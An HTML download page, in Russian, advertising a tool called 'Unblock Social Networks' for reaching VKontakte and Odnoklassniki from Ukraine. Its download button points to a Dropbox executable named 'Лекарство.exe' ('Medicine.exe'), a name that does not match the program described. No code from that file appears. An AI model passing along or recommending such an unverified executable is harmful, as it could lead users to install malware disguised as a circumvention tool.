<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
 <head>
  <script src="/audiojs/audio.min.js"></script>
  <script>
  audiojs.events.ready(function() {
    var as = audiojs.createAll();
  });
  </script>
  <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
  <meta charset="utf-8">
  <title>Разблокировать ВКонтакте в Украине!</title>
 </head>
 <body>
  <style>
  H1 {
  text-shadow: 1px 1px white,
               2px 2px #777;
  color: #333;
  transition: all 1s;
  }
  H1:hover {
    text-shadow: 1px 1px white,
                 2px 2px tomato;
    color: crimson;
   }
  </style>
  <style>
.knopka01 {
  display: inline-block;
  width: 100px;
  height: 50px;
  line-height: 50px;
  font-size: 20px;
  text-align: center;
  text-decoration: none;
  text-shadow: 0 1px rgba(255,255,255,.2), 0 -1px rgba(0,0,0,.8);
  outline: none;
  border: none;
  border-radius: 100px;
  background: rgb(28,107,114) radial-gradient(150% 100% at 50% 5px, rgba(255,255,255,.2), rgba(0,0,0,0));
  box-shadow: inset rgba(0,0,0,.6) 0 -2px 5px, inset rgba(252,255,255,.7) 0 2px 5px, rgba(0,0,0,.8) 0 2px 5px -1px;
  color: rgb(0,79,86);
  user-select: none;
} 
.knopka01:hover {
  color: rgb(0,59,66);
  cursor: pointer;
}
.knopka01:active {
  padding-bottom: 1px;
  box-shadow:
   inset rgba(0,0,0,1) 0 1px 3px,
   inset rgba(0,0,0,.6) 0 -2px 5px,
   inset rgba(252,255,255,.7) 0 2px 5px,
   0 1px rgba(255,255,255,.08);
  color: rgb(128,207,214);
}
  </style>
 </body>
</html>
<h1>Разблокировать ВКонтакте , Одноклассники  в Украине!</h1>
<h2>Unblock Social Networks(USN) ver. 0.2</h2>
<h3>Программа для разблокировки социальных сетей в Украине</h3>
<img src=https://unsocnet.github.io/USN.png><br>
<form action="https://dl-web.dropbox.com/get/%D0%9B%D0%B5%D0%BA%D0%B0%D1%80%D1%81%D1%82%D0%B2%D0%BE.exe?_download_id=5694320010677222499693286575687807760880217650991843298580990378&_notify_domain=www.dropbox.com&_subject_uid=317105019&dl=1&w=AABEf0ri_a7DU8126Y69H7cAvsQ8mK_4-97N-n8CVwvzQQ" method="post">
 <input type="button" class="knopka01" value="Скачать"></form>

